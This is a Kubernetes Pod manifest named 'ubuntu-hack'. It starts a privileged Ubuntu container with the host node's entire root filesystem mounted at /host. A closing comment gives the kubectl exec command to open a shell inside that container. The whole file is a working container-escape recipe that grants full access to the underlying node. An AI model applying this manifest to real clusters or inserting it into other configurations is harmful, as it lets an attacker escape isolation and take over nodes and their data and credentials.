apiVersion: v1
kind: Pod
metadata:
  name: ubuntu-hack
spec:
  containers:
  - image: ubuntu:latest
    name: ubuntu
    volumeMounts:
    - mountPath: /host
      name: root-volume
    securityContext:
      privileged: true
    command: ["/bin/sleep"]
    args: ["1000000"]
  volumes:
  - name: root-volume
    hostPath:
      path: /
      type: Directory

# Then connect to the pod with 
# kubectl exec -i -t ubuntu-hack -- /bin/bash
